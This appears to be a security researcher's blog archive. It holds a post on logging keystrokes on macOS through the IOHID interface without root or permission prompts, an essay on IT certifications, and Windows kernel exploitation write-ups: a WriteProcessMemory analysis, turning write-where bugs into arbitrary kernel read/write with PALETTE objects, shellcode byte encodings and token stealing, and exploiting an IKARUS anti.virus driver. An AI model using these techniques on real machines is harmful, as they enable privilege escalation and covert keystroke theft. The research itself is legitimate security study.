Saturday, February 16, 2019

macOS - keylogging through HID device interface

Just for fun I started to dig into how I could write a piece of software to detect rubber ducky style attacks on macOS. While I was reading through the IOKit API and digging into the various functions and how everything works, I came across an API call named IOHIDManagerRegisterInputValueCallback, which sounded very interesting although it wasn’t related to what I was looking for. At first read it sounded like you can monitor USB device input with it. My first trials with the enumeration showed that the built-in keyboard on a MacBook Pro also connects through the USB / IOHID interface. That made me think about whether I could log keystrokes via this API call. At this point I got totally distracted from my original goal, but I will get back to that later :) Looking up the function on Apple’s website confirmed my suspicion, it says:

Registers a callback to be used when an input value is issued by any enumerated device.

Nice! Since I’m still a complete n00b at both Swift and Objective-C, I searched Google to see if someone had already written a key logger like this, and I found good code here: macos - How to tap/hook keyboard events in OSX and record which keyboard fires each event - Stack Overflow. It is very well written and you can use it as is, although it doesn’t resolve scan codes to actual keys. The mapping is available in one of the header files: MacOSX-SDKs/IOHIDUsageTables.h at master · phracker/MacOSX-SDKs · GitHub. I extended the code to use this mapping and to write the output to a file, and it works pretty nicely. I uploaded it here:

Then I googled a bit more and came across this code, which is very nice and does it far better than mine:

The benefits of this method over the one that uses CGEventTap (commonly used in malware) are:
  1. you don’t need root privileges
  2. runs even on Mojave without asking for Accessibility permissions
  3. not (yet??) detected by ReiKey
The CGEventTap method is very deeply covered in Patrick Wardle's excellent videos
Patrick Wardle - YouTube
and the code is available in his GitHub repo
GitHub - objective-see/sniffMK: sniff mouse and keyboard events

Tuesday, December 18, 2018

My view and experience with IT certifications


I run into plenty of debates about whether IT certifications are good or bad, what the people who hold them are capable of, what the expectations should be, and so on. This post is not just about IT security certs, but IT in general. Personally I love doing certifications and have plenty of them from various vendors, so I thought I would share my view of and experience with the, let's call it, "certification industry".

People with and w/o certs

Personally I see and know basically two types of people: those who love to do certs, or at least want to do a few, and those who don't give a sh*t about certification. I want to make it clear: this doesn't reflect their skills or knowledge at all. Some of the most skilled people I know have exactly 0 certs and don't really care about them, and some of them have plenty or at least a few. I think this really comes down to personal preference. There are also a few people like me who simply like doing certifications; they are "certification monkeys" (I heard this term from Jeremy Cioara, who does excellent Cisco CBT videos).
There is another aspect to this. I have regularly participated in technical job interviews over the past couple of years, nowadays for IT security people and in the past for networking people. In both roles there are certain certifications that, if present, almost always mean that the person has deep technical knowledge, can answer the questions, and in general will have a successful interview. I'm specifically talking about OSCP and OSCE for IT security and CCIE for networks. I don't think it's only because of the actual 'certification', but also because of the soft skills you need to achieve them. Assuming you don't cheat, and I want to believe most people don't, you really have to gain plenty of knowledge and put it into practice, keep trying persistently, keep learning, put your energy into it, etc., so you can expect something solid from those people. There are people who claim plenty of experience, and some of them, even after telling me they have been doing webapp pentesting for years, can't answer a simple question about XSS. Again, this is not everyone, there are super smart people without certs (see above), but the likelihood of meeting a low performer with good certs is smaller.
So as I see it, there is this correlation: if you have a certification which is hard to achieve (OSCP, CCIE), you are most likely a capable person. And let's make it clear again: *it doesn't mean that if you don't have a certification you are not capable*.

There is also a phenomenon where some people with OSCP, CCIE, etc., you name it, get high-minded. I hate that. Please don't! You are not better or smarter than others because of that. There's no problem with being proud of it, but it goes wrong if you place yourself above others because of having a badge.


Unfortunately there are also people who achieve plenty of certs using *just* braindumps (preparation guides), taking an exam every other week. I think this not only makes the certs less valuable overall, but morally I simply can't (and no one should) agree with it. I even knew someone personally who did this and got his CCSP cert in a month, which means he took an exam every week for 4 weeks. During a job or an interview it will very quickly turn out if someone gained his/her certs by just memorising braindumps.
On the other hand, I must admit that with Cisco exams I also used braindumps after studying, but I will write about that in more detail below.

What knowledge to expect from certified people?

I often see comments trying to degrade or dignify certifications, and as I see it those come from having totally wrong expectations toward those people or the certification itself. The first thing is that a certification doesn't replace experience. For example, if someone has an OSCP (but no experience), it doesn't mean that he/she is ready to find you 0 days, write kernel exploits, be a neat web app pentester or conduct a full red team operation at a company right away. On the other hand, I believe that person will have a solid foundation that you can easily build on, so you can quickly put him/her to work without too much training, and he/she will do fine on his/her own pretty fast. The same is true for CCIE. Think about these like a university degree. Are any of those people ready to work right out of education? No way! You need to spend weeks teaching them how to use the systems they will work on, and so on, and even then they will be considered beginners. But they have a solid IT foundation and a way of thinking that you can build on.
What to expect from people who hold a certification where the exam consists of multiple choice questions? Well, definitely less than from those who passed practical hands-on exams. The personality of the person will matter a lot there, but their knowledge is probably above 0. I'm not a big fan of these, although I personally did many of them. I will write about them in more detail below.
In short, I think these will provide the person with a good foundation that you can build on. Nothing more, nothing less.

Why to certify?

There is definitely an advantage on the job market, especially with headhunters: having the right certs will make getting the job easier, or at least passing the first round easier. Unfortunately many HR people have no idea what these really mean or involve, they just look for the keywords. I remember that 10 years ago my colleague was asked by an IT(!!) headhunter: "Do you have such a thing as CCIE?" She had no idea what that is and asked it as casually as if every other person should have one. This is true to date, not everywhere, but in most places. If you apply for a Cisco job, HR will pass your CV to the technical staff more easily if you have CCNA, CCNP, etc. This is unfortunate, but I suppose we have to live with it and educate first round interviewers at the same time.
Besides the above, I personally like doing them for the following reasons:
  • It's a good challenge, and I like challenges.
  • It forces me to study the material more in depth, and makes me remember it for a longer time.
  • I like to collect badges :D

Multiple choice vs practical exam

Obviously practical exams have the most value. I think that's a no-brainer. On the other side you have the multiple choice exams, and in my experience they can be split further.
1. Cisco style
Cisco is the typical exam that I believe is highly unfair. They put in plenty of lexical questions that no one on Earth will know, or give you options that vary only slightly. For example, they had items like: "What is the colour of the Cisco wireless desktop agent if the connection is bad?" and you could choose from red, orange, yellow, and some others. Seriously, why is this important at all, and who remembers this? It won't reflect your actual knowledge. The other type is where they give you a command with 4 very slight variations, and it's not an everyday command. Now, typically on Cisco, or probably on most enterprise grade network devices, you will use tabs and question marks many times, because you can't remember every single command. You will know some, but certainly not all of them, and with such command line help available on the OS there is also no reason to remember them. Honestly this is why I used braindumps, as I believe these are unfair questions that are not designed to properly assess the students' knowledge. Not 100% of the exam is like this, but a significant part is. In reality I don't know a single person who doesn't use braindumps, for the reasons above. I always learned the material and did plenty of practicing, and I do feel that I know the stuff I took the exam for, so I don't feel that I really cheated.
2. SANS style
SANS also uses multiple choice exams, but there is a big difference. One is that you can use the study material, which means that even if you get a lexical question you can look it up, although you need to know where to look. The second is that you typically don't get such questions, but rather ones where you actually need to apply what you have learned. I think this is much better. Typically you can do 2 practice tests before the exam, which have a similar style of questions to the real one, but not the same questions. I never used braindumps with SANS exams, as there is no need if you learn the material, and I passed all of the exams I took on the first attempt.
3. EC-Council style
Maybe they have changed it by now, but in the past their exam was a joke. A few lexical questions, and plenty of questions that you could answer with common sense, especially in the CEH/ECSA exam. In short it doesn't really reflect anything.


Renewals are probably where the certification industry has gone mad, and this is the point where you will certainly feel that this is only done to harvest money, and you will quickly get disappointed. Ultimately the general concept behind renewal is to demonstrate that your knowledge is maintained/up-to-date and so on, and this is what none of the renewal methods actually ensures, at least none of those I know of. Here is why:
Cisco policy: in order to renew any associate/professional level certificate, you need to pass one exam from the same level or above, and you need to do it every 3 years. This effectively means that if I pass *any* professional exam I can renew both my CCNP Routing&Switching and Security certs. Passing, let's say, a switching exam has nothing to do with the security track, but that cert still gets renewed. Why? It won't guarantee that my Cisco Security knowledge is up-to-date. In fact I have both of those, and while I still feel confident that I have a solid CCNP R&S level of knowledge, that's certainly not true for the Security part, and I can't get rid of it if I renew my other one. This just doesn't feel right. If the renewal doesn't fulfil its purpose, why have a renewal policy at all? Money? Renewing a CCIE is even worse: you need to pass the theory exam every 2 years, despite the fact that if you passed it, the material has most likely sunk in so deeply that you will remember it longer than any professional level material.
SANS policy: collect credits for 4 years, and if you have enough you can pay a fee, and there you go, you renewed your cert. You can collect credits by taking trainings (SANS trainings are worth more than others...), going to conferences, etc., like with CISSP. I could renew my malware reverse engineering cert by taking a forensics training. Why? That training is different and didn't really contribute to my reversing skills, and it certainly doesn't mean that I can still dissect a piece of malware. SANS tries to make it look like it does, but if you are honest, it doesn't. Again, what you see here is that the renewal doesn't prove that you are still good at that topic, they just take your money.
EC-Council: similarly, you need to collect credits. Exact same story as with SANS, but instead of paying a one time fee every 4 years, they ask for an annual fee. Why? Just to harvest people's money.
Offensive Security: No renewal. I like that. I think that in order to pass the hands-on exam you have to study the material so much that it will sink in for a very long time.

I feel that the general concept of renewals is wrong at the core. You don't need to renew your university degree, although universities could easily claim that you forgot the material after a few years. I certainly don't remember the mathematics I studied for 2 years: I never used it, never really liked it, so it just faded away, and I think that will be true for everyone.

Vendors still try to push for renewals and I feel it's only about trying to tie you to their trainings, exams, and get your money.


I have many, many thoughts on this topic, it was pretty hard and took long to write this post, and I still feel that I couldn't phrase everything I wanted. I might be wrong with my view, but currently this is how I see things, and no one has to agree. The most important thoughts I would like people to take away from this post are the following:
  1. Certificate holders: Please don't be high-minded, as what you have got is "just" a foundation and there is a huge number of super smart people without certs. There's no problem with being proud of it, but on a healthy level.
  2. Non-certificate holders: Please don't degrade certificate holders' achievements, as in some cases what they achieved is really notable and not easy, and not everyone can do it.
I have a bit of fear that this post will generate a burst of hate from both sides, and vendors, but:


Windows Driver Signing Enforcement bypass

I uploaded all of the materials and files for my latest DSE bypass workshop, which I held at Defcon and Hacktivity, to my GitHub page:


Friday, August 31, 2018

About WriteProcessMemory

The contents of this post might be very well known to many people, but for me it was new and honestly also a bit shocking, so I thought I would share it, as it might be useful for others as well. I came across this behaviour when I was developing working POC code for enSilo's new TurningTables technique.

In short WriteProcessMemory will write to PAGE_EXECUTE or PAGE_EXECUTE_READ pages if you have sufficient rights (PROCESS_VM_OPERATION) to change its permissions to PAGE_EXECUTE_READWRITE. I want to highlight in the beginning that this will not bypass any built-in security feature, nor exploit anything, this is just a convenience feature.

First I will cover how it works, and at the end why.

Part 1 - How?

This is how WriteProcessMemory works in the latest Windows (1803):

First it will call NtQueryVirtualMemory to get the properties of the region.

The next step is to check if the page has any of the following protections set: PAGE_NOACCESS(0x1) | PAGE_READONLY(0x2) | PAGE_EXECUTE (0x10) | PAGE_EXECUTE_READ (0x20) 

Looking at the check bitwise:

0xcc = 1100 1100
0x1  = 0000 0001
0x2  = 0000 0010
0x10 = 0001 0000
0x20 = 0010 0000

So if we perform the TEST instruction against 0xcc, it will set the ZF flag if one of these protections is present, because none of them shares a bit with 0xcc. If not, the page has one of the WRITE bits set and the code goes straight to the NtWriteVirtualMemory call:
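The bit arithmetic of this check can be reproduced in a few lines of Python. This is only a sketch of the TEST logic, not the disassembly itself: the constants are the documented page protection values, while the helper name `zf_after_test` is made up for illustration, and protection modifiers such as PAGE_GUARD are ignored.

```python
# Page protection constants as documented for the Windows API.
PAGE_NOACCESS          = 0x01
PAGE_READONLY          = 0x02
PAGE_READWRITE         = 0x04
PAGE_WRITECOPY         = 0x08
PAGE_EXECUTE           = 0x10
PAGE_EXECUTE_READ      = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

# The four writable protections OR together to the 0xcc mask.
WRITABLE_MASK = (PAGE_READWRITE | PAGE_WRITECOPY |
                 PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)


def zf_after_test(protect):
    """Model of `TEST protect, 0xcc`: ZF is set when the AND result is zero.

    Hypothetical helper name, used only for this illustration.
    """
    return (protect & WRITABLE_MASK) == 0


if __name__ == "__main__":
    for name, value in [("PAGE_NOACCESS", PAGE_NOACCESS),
                        ("PAGE_EXECUTE_READ", PAGE_EXECUTE_READ),
                        ("PAGE_READWRITE", PAGE_READWRITE)]:
        print(f"{name:18} {value:#04x} ZF={int(zf_after_test(value))}")
```

ZF set means the page is not writable as it is, so the function has to take the longer path with the extra checks.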

If the check indicates one of the protections listed above, it will do another one:

This will jump if PAGE_NOACCESS or PAGE_READONLY is set, and we get an access denied as expected:

If not, it will do another two checks:

It checks whether the page is MEM_IMAGE (0x1000000) or MEM_PRIVATE (0x20000). Only if it is neither will it go to the same ACCESS_DENIED routine; otherwise it will set a value into EAX. That value is eventually passed in RSI to NtProtectVirtualMemory:

Now, what are those values:
0x20000000 - MEM_LARGE_PAGES (large page support)

This means that the OS will nicely change the page protection for us to writeable, without ever giving an access denied. In case it’s an image it will set it to write-copy, which means that it will create a private copy of the image loaded for the process, so it won’t overwrite shared memory.

After this the same NtWriteVirtualMemory call, shown above, will be made. Finally the page protection will be reverted to the original. Essentially we got write access to an EXECUTABLE only page, obviously only if our process has the permission to apply those changes, so it won't bypass any protection.
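To summarise the flow described so far, here is a small Python model of the decisions. It is a sketch of my reading of the logic, not the real implementation: `plan_write` is a made-up name, it only returns the list of steps, and the temporary protections (PAGE_EXECUTE_READWRITE for private memory, PAGE_EXECUTE_WRITECOPY for images) are assumptions based on the description above.

```python
PAGE_NOACCESS, PAGE_READONLY = 0x01, 0x02
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
WRITABLE_MASK = 0xCC                       # all protections that allow writing
MEM_PRIVATE, MEM_IMAGE = 0x20000, 0x1000000


def plan_write(protect, mem_type):
    """Return the steps a WriteProcessMemory-like routine would take.

    Hypothetical model: it performs no system calls, it only lists them.
    """
    if protect & WRITABLE_MASK:
        return ["write"]                   # already writable, write directly
    if protect & (PAGE_NOACCESS | PAGE_READONLY):
        return ["access_denied"]
    if mem_type == MEM_IMAGE:
        temporary = PAGE_EXECUTE_WRITECOPY  # assumption: private copy of the image page
    elif mem_type == MEM_PRIVATE:
        temporary = PAGE_EXECUTE_READWRITE  # assumption
    else:
        return ["access_denied"]           # neither image nor private memory
    # change the protection, write, then restore the original protection
    return [("protect", temporary), "write", ("protect", protect)]


if __name__ == "__main__":
    print(plan_write(0x20, MEM_PRIVATE))   # PAGE_EXECUTE_READ, private memory
    print(plan_write(0x02, MEM_PRIVATE))   # PAGE_READONLY
```

The point of the model is the third branch: an execute-only or execute-read page is not rejected, it is silently made writable for the duration of the write.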

On older versions of Windows 10, the function is slightly different but the logic is exactly the same:

On Windows 7 or 8 the behaviour also exists but the function logic is different. It will try to set the memory to PAGE_EXECUTE_READWRITE or, if that fails, to PAGE_READWRITE right away:

Then it will check if the old protection was either PAGE_EXECUTE_READWRITE, PAGE_READWRITE or PAGE_WRITECOPY. If yes, it will restore the original protection (as the memory was already writeable) and write to it. If not, it will check if it’s PAGE_NOACCESS | PAGE_READONLY. If yes, it will return ACCESS_DENIED, otherwise it will call NtWriteVirtualMemory while the page protection is set to PAGE_EXECUTE_READWRITE/PAGE_READWRITE. Again, a shortcut to have write access to EXECUTABLE pages.

Here is the write:

The ReactOS code will reflect this behaviour:

Yes, you could also set the page protection yourself, but the OS will nicely do it for you, so one less thing to care about when developing an exploit. In my opinion based on MSDN this should fail however (but maybe I misinterpret it):

PAGE_EXECUTE - 0x10 - Enables execute access to the committed region of pages. An attempt to write to the committed region results in an access violation.
PAGE_EXECUTE_READ - 0x20 - Enables execute or read-only access to the committed region of pages. An attempt to write to the committed region results in an access violation.

What happens if we call NtWriteVirtualMemory directly? Then it fails as expected as the page protection is not modified, for example it will fail with:

0x8000000D - STATUS_PARTIAL_COPY - Because of protection conflicts, not all the requested bytes could be copied.

Part 2 - Why?

I found many mentions here and there that this will work, but in the end I contacted Microsoft for further explanation. I got one, and I want to thank them for providing these insights. Basically this is done for debuggers: if a debugger wants to write to memory, it can simply call this API without having to set the page protection every single time. Here are the details:

Here is what that above site says:

"There are a bunch of functions that allow you to manipulate the address space of other processes, like Write­Process­Memory and Virtual­Alloc­Ex. Of what possible legitimate use could they be? Why would one process need to go digging around inside the address space of another process, unless it was up to no good? These functions exist for debuggers. For example, when you ask the debugger to inspect the memory of the process being debugged, it uses Read­Process­Memory to do it. Similarly, when you ask the debugger to update the value of a variable in your process, it uses Write­Process­Memory to do it. And when you ask the debugger to set a breakpoint, it uses the Virtual­Protect­Ex function to change your code pages from read-execute to read-write-execute so that it can patch an int 3 into your program. If you ask the debugger to break into a process, it can use the Create­Remote­Thread function to inject a thread into the process that immediately calls Debug­Break. (The Debug­Break­Process was subsequently added to make this simpler.) But for general-purpose programming, these functions don't really have much valid use. They tend to be used for nefarious purposes like DLL injection and cheating at video games."

UPDATE 2018.09.02. - The story gets worse

So after writing this comes Alex Ionescu and makes it even worse :D

With that, the post wouldn’t be complete without explaining what Alex Ionescu pointed out, which I think is much worse than the first part. My brain couldn't stop thinking about this over the weekend, and when the light came I reached out to Alex.

You can use this function to write to kernel pages from user mode. This sounds terrible at first, at second and also at third glance, but you will see that it's not that horrible, only a little bit. :) So why does this happen:

When you call WriteProcessMemory it will call ntdll!NtWriteVirtualMemory which will eventually call nt!NtWriteVirtualMemory, which in newer Win10 versions will call nt!MiReadWriteVirtualMemory. That is the point where it is checked if you come from user land and can write to the targeted memory, to avoid writing to the kernel. But what is really being checked?

1. It will check if the API is being called from kernel or user space (PreviousMode).
2. If you come from user mode, it will perform another check which is verifying the address range you are trying to write to, based on the MmUserProbeAddress variable, which points to the end of the user address space. On x64 machines this is a hardcoded value in the code, so there is no actual variable, as you can see below in IDA.

Here is the related ReactOS code snippet for easier understanding (which reflects older Windows versions, but the idea is the same):

    if (PreviousMode != KernelMode)
    {
        //
        // Validate the read addresses
        //
        if ((((ULONG_PTR)BaseAddress + NumberOfBytesToWrite) < (ULONG_PTR)BaseAddress) ||
            (((ULONG_PTR)Buffer + NumberOfBytesToWrite) < (ULONG_PTR)Buffer) ||
            (((ULONG_PTR)BaseAddress + NumberOfBytesToWrite) > MmUserProbeAddress) ||
            (((ULONG_PTR)Buffer + NumberOfBytesToWrite) > MmUserProbeAddress))
        {

If you pass these checks the write will happen.
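The same range check can be modelled in Python to see what it does and doesn't cover. This is a sketch, not kernel code: `passes_user_probe` is a made-up name, the 64-bit wrap-around is emulated with a mask, and the probe value 0x00007FFFFFFF0000 is the usual x64 constant, taken here as an assumption.

```python
MASK64 = (1 << 64) - 1

# Assumption: the usual end of the user address range on x64.
MM_USER_PROBE_ADDRESS = 0x00007FFFFFFF0000


def passes_user_probe(base_address, buffer, length,
                      probe=MM_USER_PROBE_ADDRESS):
    """Model of the ReactOS check: only address ranges are validated."""
    base_end = (base_address + length) & MASK64   # emulate ULONG_PTR overflow
    buffer_end = (buffer + length) & MASK64
    if base_end < base_address or buffer_end < buffer:
        return False                              # the addition wrapped around
    if base_end > probe or buffer_end > probe:
        return False                              # range reaches past user space
    return True


if __name__ == "__main__":
    print(passes_user_probe(0x10000, 0x20000, 0x100))              # user range
    print(passes_user_probe(0xFFFFF80000000000, 0x20000, 8))       # kernel range
```

Note that nothing in this check looks at the page tables: an address passes purely because of where it is, not because of what kind of page is mapped there.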

For kernel exploit writers the flaw is probably obvious at this point if you think about the classic SMEP bypass:
—> from page 31

Here is the issue in short:
If you can set the U/S (owner) bit to 0 (clear) in a PTE, it will mean that the page belongs to the kernel. Normally you don’t have any kernel pages in the user address space, but if you manage to mess with the PTE (with a kernel exploit), you can have one and it will be valid: you can turn a user page into a kernel page. If that happens, you can use WriteProcessMemory to write to those pages, as the actual PTE flag is not verified, which means that you write to kernel pages from user mode.
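For reference, this is what flipping the owner bit looks like on a raw PTE value. It is only bit arithmetic in Python: the flag positions are the standard x86-64 ones (bit 0 Present, bit 1 R/W, bit 2 U/S), while the helper names and the sample PTE value are made up for illustration.

```python
PTE_PRESENT = 1 << 0   # P
PTE_WRITE   = 1 << 1   # R/W
PTE_USER    = 1 << 2   # U/S: 1 = user page, 0 = supervisor (kernel) page


def is_user_page(pte):
    return bool(pte & PTE_USER)


def make_supervisor(pte):
    """Clear the U/S bit, turning a user page into a kernel page."""
    return pte & ~PTE_USER


if __name__ == "__main__":
    sample_pte = 0x8000000012345867          # hypothetical PTE value
    patched = make_supervisor(sample_pte)
    print(hex(sample_pte), is_user_page(sample_pte))
    print(hex(patched), is_user_page(patched))
```

The virtual address that this PTE maps stays in the user range, so the address range check still passes after the change.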

Obviously this doesn’t happen normally, but still…

Additionally, on older systems you could modify MmUserProbeAddress (for example with a write-what-where kernel exploit) and set it to the end of the kernel address space. At that point you have also bypassed the verification, and you have very nice R/W access to kernel space. These days you would need to patch the actual code, which is protected by HVCI and PatchGuard (PG), so it’s not really possible unless you exploit the hypervisor.

Overall potentially you can have write access to kernel address space from user mode, but not by default, and not in a straightforward way.

I want to thank Alex again, first for pointing this out, and then for talking through this whole stuff with me.

Thursday, December 28, 2017

Convert Write-Where kernel exploits into arbitrary Write-What-Where exploit

This post is a follow up of my previous post: I realised that the technique I used there can be generalised.
  1. Currently it’s known that we can create PALETTE objects in the large session pool, and we can leak their address.
  2. We can allocate two PALETTE objects, one after the other, and even without spraying they will be close enough to each other (less than 0x1000000 bytes apart). This comes from my testing, running it many times.
  3. If we have a write-where vulnerability (where we can't control what we write), we can use it to modify the size of the PALETTE object by modifying 1 byte in the cEntries field. The only requirements are that we can precisely set the location and that the value written is something other than 0. We will target the location marked with ** below:

    0: kd> dd fffff8cc44dc4000
    fffff8cc`44dc4000  fe0809ec ffffffff 00000000 00000000
    fffff8cc`44dc4010  26986580 ffffd687 00000501 **0003de
    fffff8cc`44dc4020  0096f8aa 00000000 00000000 00000000
    fffff8cc`44dc4030  00000000 00000000 00000000 00000000
    fffff8cc`44dc4040  00000000 00000000 00000000 00000000
    fffff8cc`44dc4050  00000000 00000000 00000000 00000000
    fffff8cc`44dc4060  00000002 00000001 00000000 00000000
    fffff8cc`44dc4070  00000000 00000000 44dc4088 fffff8cc

  4. Luckily the 7 bytes before and 8 bytes after that byte are not so important, so if we smash them we will not cause a BSOD and we can continue to use the object. Essentially the fields surrounding cEntries in the PALETTE structure (listed below with their offsets) won't cause an issue if we overwrite them; anything further before or after will cause a BSOD:

     BASEOBJECT64      BaseObject;    // 0x00
     FLONG             flPal;         // 0x18
     ULONG32           cEntries;      // 0x1C
     ULONG32           ulTime;        // 0x20
     HDC               hdcHead;       // 0x24
     ULONG64           hSelected;     // 0x28

  5. By changing that byte to anything other than 0, we increase the size of our PALETTE to more than 4 * 0x1000000 bytes, which means that if we have another one nearby (and as we saw in step 2, we can), we can write to it with out-of-bounds writes
  6. We overwrite the pFirstColor pointer of the 2nd PALETTE to point to our original PALETTE’s pFirstColor memory location, thus achieving a classic GDI read / write primitive, which gives us arbitrary kernel read / write
Again, the practical use of this can be seen here:

This will also work if we have another type of vulnerability where we can decrement / increment a value at a memory location of our choice. We pick the byte above (**) as the target for the decrement or increment, and we achieve the same.
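The size argument can be checked with a bit of arithmetic. The sketch below assumes 4 bytes per palette entry (which is what the "4 * 0x1000000" figure implies) and uses made-up helper names; it only shows that any nonzero value in the high byte of cEntries is enough to reach a neighbour that is less than 0x1000000 bytes away.

```python
ENTRY_SIZE = 4                 # assumption: one palette entry is 4 bytes
MAX_DISTANCE = 0x1000000       # palettes were observed closer than this


def reach_after_overwrite(centries, written_byte):
    """Return (new cEntries, addressable bytes) after setting the high byte."""
    new_centries = (centries & 0x00FFFFFF) | (written_byte << 24)
    return new_centries, new_centries * ENTRY_SIZE


def neighbour_reachable(centries, written_byte, distance=MAX_DISTANCE):
    _, reach = reach_after_overwrite(centries, written_byte)
    return reach > distance


if __name__ == "__main__":
    # 0x3de is the cEntries value visible in the dump above.
    for value in (0x01, 0x11, 0xFF):
        new, reach = reach_after_overwrite(0x3DE, value)
        print(f"byte {value:#04x}: cEntries={new:#010x} reach={reach:#x}")
    # An increment of the high byte by one behaves like writing 0x01 there.
    print(neighbour_reachable(0x3DE, 0x00 + 1))
```

Even the smallest nonzero byte (0x01) gives a reach of more than 0x4000000 bytes, which is why the value we can't control doesn't matter.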


  • The PALETTE itself, it won't work beyond Win10 RS3
  • If the write that we don't control is larger than 0x10 bytes, this can't be used, as we would overwrite other fields that will cause a BSOD

Friday, December 1, 2017

kex - python kernel exploit library - update #3

Another week passed, another update. Not sure how long I can keep up with this frequency :)

  • all 3 shellcodes (token stealing, update token privileges, update ACL of target process)
    • padded all of them with NOPs, so their length is divisible by 4. This is required if we use PALETTE objects as the r/w primitive to write the shellcode somewhere: if the shellcode length is not divisible by 4, the last couple of bytes will be missing, as we can only write multiples of 4 bytes with PALETTEs
    • in newer Windows versions the offset of the KTHREAD->Process pointer is larger than 0x7f (specifically 0xb8), which means that the assembly code is different
      • for offsets <0x80:
        • "\x48\x8b\x40" + 1 byte value (e.g.: 0x7f)
      • for offsets >=0x80:
        • "\x48\x8b\x80" + 1 byte value (e.g.: 0xb8) + "\x00\x00\x00"
  • all 3 shellcodes are verified now to work
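The two encodings and the padding can be sketched as follows. This is not the code from the kex library, just an illustration with made-up function names: the bytes above decode as `mov rax, [rax + offset]`, where the short form takes a signed 8-bit displacement (hence the 0x7f limit) and the long form a 32-bit little-endian one.

```python
import struct


def mov_rax_from_rax_offset(offset):
    """Encode `mov rax, [rax + offset]` with the shortest displacement."""
    if 0 <= offset < 0x80:
        # ModRM 0x40: 8-bit displacement follows
        return b"\x48\x8b\x40" + struct.pack("<B", offset)
    # ModRM 0x80: 32-bit little-endian displacement follows
    return b"\x48\x8b\x80" + struct.pack("<I", offset)


def pad_to_multiple_of_4(shellcode):
    """Append NOPs (0x90) until the length is divisible by 4."""
    padding = (-len(shellcode)) % 4
    return shellcode + b"\x90" * padding


if __name__ == "__main__":
    print(mov_rax_from_rax_offset(0x7F).hex())
    print(mov_rax_from_rax_offset(0xB8).hex())
    print(pad_to_multiple_of_4(mov_rax_from_rax_offset(0xB8)).hex())
```

The long form is 7 bytes, so on its own it needs one NOP to become writable in 4 byte chunks.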
The new additions are based on the following resources:

  • Leaking NT base, HalDispatchTable, PTE base address using PALETTE objects
  • Calculate PTE address for a given virtual address
  • Ability to change a VA to executable
  • An example for the new functions using the HEVD driver as usual
With that you can write a shellcode to kernel space, change the execution flag in its PTE, update HalDispatchTable and trigger the shellcode, which is what happens in the added example. It all works from low privilege mode, up to Windows 10 RS3 (v1709 / FCU).
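The PTE calculation itself is short. The sketch below uses the commonly used x64 formula and made-up function names; it is not copied from kex. The PTE base has to be leaked on newer Windows 10 builds, so the fixed value used in the example (0xFFFFF68000000000, the base on older systems) is only there to have something to compute with.

```python
NX_BIT = 1 << 63          # bit 63 of a PTE: no-execute


def pte_address(virtual_address, pte_base):
    """Address of the PTE that maps virtual_address (4 KB pages)."""
    return ((virtual_address >> 9) & 0x7FFFFFFFF8) + pte_base


def make_executable(pte):
    """Clear the NX bit so the page becomes executable."""
    return pte & ~NX_BIT


if __name__ == "__main__":
    old_pte_base = 0xFFFFF68000000000      # fixed base on older Windows versions
    va = 0xFFFFF78000000000                # example kernel virtual address
    print(hex(pte_address(va, old_pte_base)))
    print(hex(make_executable(0x8000000012345863)))   # hypothetical PTE value
```

Shifting by 9 instead of 12 works because each 4 KB page has an 8 byte PTE, and the mask keeps the result 8 byte aligned inside the PTE region.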

Saturday, November 25, 2017

kex - python kernel exploit library - major update #2

I made a larger update to my kex library again. Token stealing is not the only way in kernel exploitation; I suggest reading the following:

I essentially implemented additional shellcodes based on Cerrudo's BlackHat talk and Martin Schenk's blogpost. There are a few differences between how I implemented them and how Martin did:

  1. I elevate my own process privileges, not the parent or cmd.exe
  2. I use different offset in KTHREAD to find the EPROCESS structure (nt!_KTHREAD ->  _KAPC_STATE -> EPROCESS), so you will see different values there
  3. I used PALETTEs for data-only pwning and not the tagWND method, this also means that it won't work beyond Win10 RS3
  4. The token overwrite has been extended to also change the Present bit as it is required after Win10 RS3, as described here:!_SEP_TOKEN_PRIVILEGES-Single_Write_EoP_Protect.pdf
  5. I added all offsets from Win7 to Win10 RS3 so the code should work universally across all platforms

I added an example with the HEVD driver to show how all of this works. I didn't have a chance to test the actual shellcodes, only the data-only variant, so if there are any issues, let me know.


Wednesday, November 15, 2017

Turning CVE-2017-14961 (IKARUS anti.virus local kernel exploit) into full arbitrary read / write with PALETTE objects

There are 9 exploitable kernel vulnerabilities in IKARUS anti.virus <2.6.18, discovered by @ParvezGHH. You can read more about them here:

I found Parvez's exploit for the above CVE very nice and clean, and I usually like simplicity. This specific vulnerability lets an attacker write 0x11 to an arbitrary location, which is entirely under the attacker's control. Triggering is extremely simple: we send in an empty input, and 0x11 will be written to the address we provide for the output buffer. Parvez used this to overwrite the TOKEN privileges of the given process to gain SeDebugPrivilege and then inject a cmd.exe shellcode into winlogon.exe. Nice and clean, and it works universally. I took the opportunity to write this in Python and extend my kex library with some useful functions that perform the TOKEN lookup and code injection.

However I wanted to practice kernel exploitation techniques a bit and decided to turn this into a full arbitrary read / write. In short I wanted to be able to read / write any kernel memory of my choice with the value I want. I also wanted to keep the exploit universal (Win7 to Win10 RS3) and if possible trigger it from low integrity mode. I’m not done with the low integrity part, and I will try to finish it if I have time later, but all the others went fine.

A universal read / write can be done if we can use the PALETTE read / write primitives, but obviously we can’t directly overwrite the pFirstColor pointer of any palette with the vulnerability. So I went with the idea of an out-of-bounds write, which is commonly used with session pool spraying with GDI objects. Let me explain the game plan step by step.
  1. Allocate two palettes at known location
  2. Overwrite the cEntries field of one of the palettes, and thus increasing the size.
  3. Use the enlarged palette to overwrite the pFirstColor offset in the second palette —> we are pretty much done at this point, as we can use the regular read / write primitives
  4. Steal token
The first point is achieved via reserving and freeing Windows, and if they get allocated to the same place, we can predict that if we free it and allocate the palette next, it will be at the same location, this works for large pools, for objects size >= 0x1000 (4kB). This is pretty standard, and easy, already implemented in my kex library. Essentially this is the code snippet to do this:

palette_1_address = alloc_free_windows(0)
palette_1_handle = create_palette_with_size(0x1000)
palette_1_pFirstColor = palette_1_address + pFirstColor_offset

palette_2_address = alloc_free_windows(0)
palette_2_handle = create_palette_with_size(0x1000)
palette_2_pFirstColor = palette_2_address + pFirstColor_offset

The second point is to calculate the address where we want to write 0x11. From this point on, we need to make sure that we use the palettes in the right order, as there is no guarantee that palette1 is placed at a lower memory location than palette2, although it is likely. In this writeup let’s assume that palette1 comes before palette2. So the location is:

